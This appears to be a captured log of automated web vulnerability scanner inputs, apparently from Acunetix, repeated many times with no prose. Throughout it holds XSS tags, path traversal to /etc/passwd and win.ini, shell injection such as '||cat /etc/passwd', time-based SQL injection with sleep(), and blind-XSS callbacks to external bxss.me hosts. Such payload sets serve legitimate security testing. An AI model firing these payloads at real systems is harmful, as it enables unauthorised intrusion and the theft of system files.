1

1<ScRiPt%20>prompt(997713)</sCripT>

.\./.\./.\./.\./.\./.\./etc/passwd

"|"ld

1

1

!(()&&!|*|*|

z9ylXUDk'))

testasp.vulnweb.com

'"()

1&lt

/etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

'

'

-1

1

1

<img acu onmouseover=prompt(976996) //>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

"

"

-1)

1

1

1<input autofocus onfocus=prompt(974188)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

-1))

1

http://hitB955Q4kcch.bxss.me/

1

................etc/passwd

acunetix_wvs_invalid_filename

1

&dir

[url=http://www.acunetix.com]website security[/url]

1

${@print(md5(acunetix_wvs_security_test))}\

LsNrjsOs'

1

1

comments

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1_pkXnH <ScRiPt >prompt(971785)</ScRiPt>

WRnXYFSq')

1

http://www.acunetix.tst

file:///etc/passwd

comments

1

1

1

"&dir&"

1

1

pxyGnyC5'))

1

1

/\../\../\../\../\../\../\../etc/passwd

comments/.

1

|dir

'"

1'"()&%<ScRiPt >prompt(973745)</ScRiPt>

1

1

1

1

WEB-INF/web.xml

1

'|dir

<!--

1

'"()&%<ScRiPt >prompt(901027)</ScRiPt>

1

1

1

WEB-INF\web.xml

1

"|dir

1

1_997056

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu8093<s1﹥s2ʺs3ʹuca8093

1

../../../../../../../../../../boot.ini

1

acux4873z1z2abcxuca4873

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(992645)</ScRiPt>

1

windowswin.ini

1

1

1<script>prompt(933065)</script>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(912098)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?932161></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(923224)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<video><source onerror="javascript:prompt(950320)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951665)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(920066))>

response.write(9270127*9399396)

1

1

1

&cat /etc/passwd&

1<iframe src='data:text/html

'+response.write(9270127*9399396)+'

1

1

1

WEB-INF/web.xml

1<body onload=prompt(969533)>

'&cat /etc/passwd&'

"+response.write(9270127*9399396)+"

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(918011)>

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

"&cat /etc/passwd&"

1

1

1<img src=xyz OnErRor=prompt(932777)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

cat /etc/passwd

1

1

1<img/src=">" onerror=alert(909984)>

../../../../../../../../../../etc/passwd.jpg

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1

`cat /etc/passwd`

${100347+99211}

-1)

1

1<ScRiPt%20>prompt(987913)</sCripT>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

1

1

-1))

1&lt

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

1&n972001=v945767

vJq5DkOM'

1

<img acu onmouseover=prompt(955401) //>

)

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

1

4Flj29UR')

1

1<input autofocus onfocus=prompt(997961)>

1

!(()&&!|*|*|

.\./.\./.\./.\./.\./.\./etc/passwd

testasp.vulnweb.com

<a href='http://www.acunetix.com'>website security</a>

FTC02UsD'))

1

^(#$!@#$)(()))******

1

'"()

/etc/passwd

1

'

'

[url=http://www.acunetix.com]website security[/url]

-1

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

"

1_arF3f <ScRiPt >prompt(953085)</ScRiPt>

-1)

1

1

1

1

1

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

-1))

1

1

1

http://hitGJELHxiFZh.bxss.me/

&dir

................etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

9Cv8Jpi4'

acunetix_wvs_invalid_filename

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

1

1

ni3drKeV')

comments

1

1

"&dir&"

file:///etc/passwd

1

comments

1

http://www.acunetix.tst

cTxMIMBt'))

'"

1'"()&%<ScRiPt >prompt(928095)</ScRiPt>

1

|dir

/\../\../\../\../\../\../\../etc/passwd

1

comments/.

1

1

'"()&%<ScRiPt >prompt(960390)</ScRiPt>

<!--

'|dir

1

WEB-INF/web.xml

1

1

1_988338

1

1

WEB-INF\web.xml

1

1

1

acu8366<s1﹥s2ʺs3ʹuca8366

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

acux9927z1z2abcxuca9927

1

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(949208)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<script>prompt(930242)</script>

1

1

windowswin.ini

1

1<ScRiPt >prompt(948223)</ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?916843></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(919824)</ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<video><source onerror="javascript:prompt(945350)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(949401)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(990799))>

1

response.write(9409789*9044976)

1

1

1

1<iframe src='data:text/html

1

1

'+response.write(9409789*9044976)+'

WEB-INF/web.xml

1<body onload=prompt(991486)>

&cat /etc/passwd&

1

"+response.write(9409789*9044976)+"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(982080)>

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(981704)>

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(930335)>

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

-1)

1

1

${100076+99718}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1))

1<ScRiPt%20>prompt(975851)</sCripT>

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

1some_inexistent_file_with_long_name%00.jpg

ohSSkua9'

1&lt

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

8ipHvj3c')

1

1

1&n910405=v911624

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

<img acu onmouseover=prompt(936104) //>

'|'ld

1

15TiqcJg'))

"|"ld

)

1

1

testasp.vulnweb.com

.\./.\./.\./.\./.\./.\./etc/passwd

1<input autofocus onfocus=prompt(996142)>

1

-1

!(()&&!|*|*|

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

1

/etc/passwd

1

-1)

^(#$!@#$)(()))******

'

1

'

1

[url=http://www.acunetix.com]website security[/url]

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1))

"

1

1

"

1

1_418VZ <ScRiPt >prompt(939881)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

ISeRKPza'

................etc/passwd

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

http://hitAG1bpTnuZR.bxss.me/

1

1

1

X3KDYZsz')

comments

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

SW2fOjoM'))

1

comments

'&dir&'

file:///etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1'"()&%<ScRiPt >prompt(958046)</ScRiPt>

http://www.acunetix.tst

1

1

comments/.

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1

'"

1

1

1

1

1

|dir

WEB-INF/web.xml

<!--

1

'"()&%<ScRiPt >prompt(950515)</ScRiPt>

1

1

'|dir

WEB-INF\web.xml

1

1

1

1_977513

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

acu8335<s1﹥s2ʺs3ʹuca8335

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux4432z1z2abcxuca4432

1

1

1

1

windowswin.ini

1<ScRiPt >prompt(996807)</ScRiPt>

1

1

1

1<script>prompt(990695)</script>

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(978045)</ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?997336></ScRiPt>

1

1

1<ScRiPt >prompt(931911)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(991063)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(926653)"></g></svg>

1

response.write(9676008*9236665)

WEB-INF/web.xml

1

1

1<div style=width:expression(prompt(957820))>

'+response.write(9676008*9236665)+'

WEB-INF\web.xml

1

&cat /etc/passwd&

1

1

1<iframe src='data:text/html

"+response.write(9676008*9236665)+"

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(905809)>

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(969538)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

-1

1

SomeCustomInjectedHeader:injected_by_wvs

1

${99809+100470}

1<img src=xyz OnErRor=prompt(976508)>

1

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

-1)

1

|cat /etc/passwd#

1

1

1<img/src=">" onerror=alert(994971)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1

'|'ld

)

1&n928675=v996490

1

1some_inexistent_file_with_long_name%00.jpg

1

1<ScRiPt%20>prompt(908905)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

3peIIbGk'

!(()&&!|*|*|

1

"|"ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

6ZlZaODB')

testasp.vulnweb.com

^(#$!@#$)(()))******

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

<img acu onmouseover=prompt(900398) //>

PHlBaxq5'))

1

1

1

'"()

'

'

1<input autofocus onfocus=prompt(957131)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

-1

1

1

1

1

"

"

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

http://hitYPMiLpyX1A.bxss.me/

1

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

................etc/passwd

acunetix_wvs_invalid_filename

1_ngCFa <ScRiPt >prompt(974207)</ScRiPt>

PMnDkvP0'

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

'&dir&'

1

OGew6RpN')

http://www.acunetix.tst

1

1

1

file:///etc/passwd

'"

"&dir&"

comments

0mhFyRcx'))

1

1

1'"()&%<ScRiPt >prompt(938146)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

|dir

<!--

comments/.

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(975143)</ScRiPt>

1

'|dir

1

1

1

1

1

WEB-INF\web.xml

1_963325

"|dir

1

1

1

1

../../../../../../../../../../windows/win.ini

acu2787<s1﹥s2ʺs3ʹuca2787

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

acux6251z1z2abcxuca6251

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(953403)</ScRiPt>

1

1

1

windowswin.ini

1<script>prompt(967542)</script>

1

1

1

1<ScRiPt >prompt(945915)</ScRiPt>

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?990189></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(909986)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<video><source onerror="javascript:prompt(908442)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973255)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(988119))>

response.write(9115169*9693819)

1

1

&cat /etc/passwd&

1

1<iframe src='data:text/html

'+response.write(9115169*9693819)+'

WEB-INF/web.xml

1

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

"+response.write(9115169*9693819)+"

1<body onload=prompt(926950)>

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

cat /etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(966471)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

-1

1<img src=xyz OnErRor=prompt(980766)>

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

-1)

|cat /etc/passwd#

1<img/src=">" onerror=alert(998606)>

1

1

${99079+99843}

1&n994948=v917349

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1))

'|'ld

1

1

1<ScRiPt%20>prompt(997168)</sCripT>

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

0JLe8NEX'

"|"ld

1

)

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

gDJd0zqR')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

!(()&&!|*|*|

<img acu onmouseover=prompt(988791) //>

testasp.vulnweb.com

'

.\./.\./.\./.\./.\./.\./etc/passwd

1

'

bJbifYXw'))

1

1

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(904447)>

1

"

/etc/passwd

1

1

"

-1

1

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

||cat /etc/passwd

-1)

[url=http://www.acunetix.com]website security[/url]

1

http://hitrDDYPXXUVX.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

comments

&dir

-1))

1

1_NNZ8f <ScRiPt >prompt(903892)</ScRiPt>

1

1

................etc/passwd

1

'&dir&'

comments

5lkemKIU'

1

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"&dir&"

1

8mtXgSlz')

comments/.

1

1

http://www.acunetix.tst

file:///etc/passwd

1

|dir

1

0K3ZaKWE'))

1

1

'"

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(945796)</ScRiPt>

1

1

1

<!--

"|dir

1

'"()&%<ScRiPt >prompt(906129)</ScRiPt>

WEB-INF/web.xml

1

1

1

1

1

1_961565

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

acu3016<s1﹥s2ʺs3ʹuca3016

1

1

1

../../../../../../../../../../boot.ini

acux10236z1z2abcxuca10236

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(938935)</ScRiPt>

1

1

windowswin.ini

1

1<script>prompt(914645)</script>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(957528)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983628></ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<ScRiPt >prompt(978166)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(907186)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(932652)"></g></svg>

1

1

response.write(9651234*9881526)

1

1

1<div style=width:expression(prompt(908121))>

1

'+response.write(9651234*9881526)+'

&cat /etc/passwd&

1

1

WEB-INF/web.xml

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

"+response.write(9651234*9881526)+"

1

'&cat /etc/passwd&'

1

WEB-INF\web.xml

1<body onload=prompt(903684)>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

"&cat /etc/passwd&"

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942791)>

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1

cat /etc/passwd

1

1

1

1<img src=xyz OnErRor=prompt(944293)>

1

-1)

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

1

${99520+99734}

1<img/src=">" onerror=alert(938699)>

-1))

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

1

1<ScRiPt%20>prompt(957348)</sCripT>

1&n965334=v903936

PI4Ydm13'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

1

)

1

1&lt

7POYDrEb')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"|"ld

!(()&&!|*|*|

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

<img acu onmouseover=prompt(978497) //>

u1Ltq8om'))

.\./.\./.\./.\./.\./.\./etc/passwd

testasp.vulnweb.com

^(#$!@#$)(()))******

1

'

1

1

1<input autofocus onfocus=prompt(923675)>

-1

/etc/passwd

1

1

1

"

'

1

1

<a href='http://www.acunetix.com'>website security</a>

-1)

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

${@print(md5(acunetix_wvs_security_test))}

http://hitKcHXdgT6Pq.bxss.me/

acunetix_wvs_invalid_filename

[url=http://www.acunetix.com]website security[/url]

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

1

comments

1_MI4us <ScRiPt >prompt(971008)</ScRiPt>

1

1

MfE2gu4f'

1

1

................etc/passwd

&dir

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Cjg5Hxek')

http://www.acunetix.tst

1

1

1

'&dir&'

1

comments/.

1

rPw2YDwC'))

1

1

1

'"

file:///etc/passwd

"&dir&"

1

1

1'"()&%<ScRiPt >prompt(904388)</ScRiPt>

1

1

1

<!--

/\../\../\../\../\../\../\../etc/passwd

|dir

1

'"()&%<ScRiPt >prompt(986288)</ScRiPt>

1

1

1

1

1

WEB-INF/web.xml

1

'|dir

1_984450

1

1

1

"|dir

1

1

WEB-INF\web.xml

acu8987<s1﹥s2ʺs3ʹuca8987

1

1

1

1

../../../../../../../../../../windows/win.ini

acux2585z1z2abcxuca2585

1

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(992856)</ScRiPt>

1

1

1

1<script>prompt(948597)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(955156)</ScRiPt>

1

windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?969131></ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(989700)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(965381)">

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(907138)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<div style=width:expression(prompt(964999))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<iframe src='data:text/html

1

1<body onload=prompt(922408)>

1

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942594)>

1

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(979079)>

1

1

1<img/src=">" onerror=alert(920874)>

1

1

1<ScRiPt%20>prompt(905714)</sCripT>

1

1

1&lt

1

<img acu onmouseover=prompt(903238) //>

1

1

1<input autofocus onfocus=prompt(959996)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_NLbi0 <ScRiPt >prompt(991553)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9793239*9015120)

1

1

1

'+response.write(9793239*9015120)+'

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

"+response.write(9793239*9015120)+"

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

-1

1

1

1

cat /etc/passwd

${100293+99514}

../../../../../../../../../../etc/passwd.jpg

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

`cat /etc/passwd`

1

-1))

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

1

1

1&n907704=v936249

|cat /etc/passwd#

tmzdlB9K'

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'|'ld

xnfmSPFi')

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

1

testasp.vulnweb.com

B5yfViaL'))

^(#$!@#$)(()))******

"|"ld

.\./.\./.\./.\./.\./.\./etc/passwd

1

-1

1

1

1

'

/etc/passwd

-1)

1

1

1

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

-1))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

dW890VHv'

acunetix_wvs_invalid_filename

1

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitet927OMPXd.bxss.me/

................etc/passwd

||cat /etc/passwd

1

MD2vCy25')

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

g8WeLy8a'))

comments

1

&dir

1

1

http://www.acunetix.tst

1

'"

comments/.

file:///etc/passwd

1'"()&%<ScRiPt >prompt(992409)</ScRiPt>

'&dir&'

1

1

<!--

1

1

'"()&%<ScRiPt >prompt(992626)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

"&dir&"

1

1

1

WEB-INF/web.xml

1_961373

|dir

1

1

1

acu6053<s1﹥s2ʺs3ʹuca6053

WEB-INF\web.xml

1

'|dir

1

acux7055z1z2abcxuca7055

1

"|dir

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(975801)</ScRiPt>

1

1

1

../../../../../../../../../../boot.ini

1

1<script>prompt(998951)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(925266)</ScRiPt>

1

1

windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995423></ScRiPt>

1

1

................windowswin.ini

1<ScRiPt >prompt(921110)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(992114)">

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906626)"></g></svg>

1

response.write(9152046*9367779)

1<div style=width:expression(prompt(916867))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'+response.write(9152046*9367779)+'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

1

"+response.write(9152046*9367779)+"

&cat /etc/passwd&

1

1<body onload=prompt(984343)>

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996515)>

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(937182)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

WEB-INF\web.xml

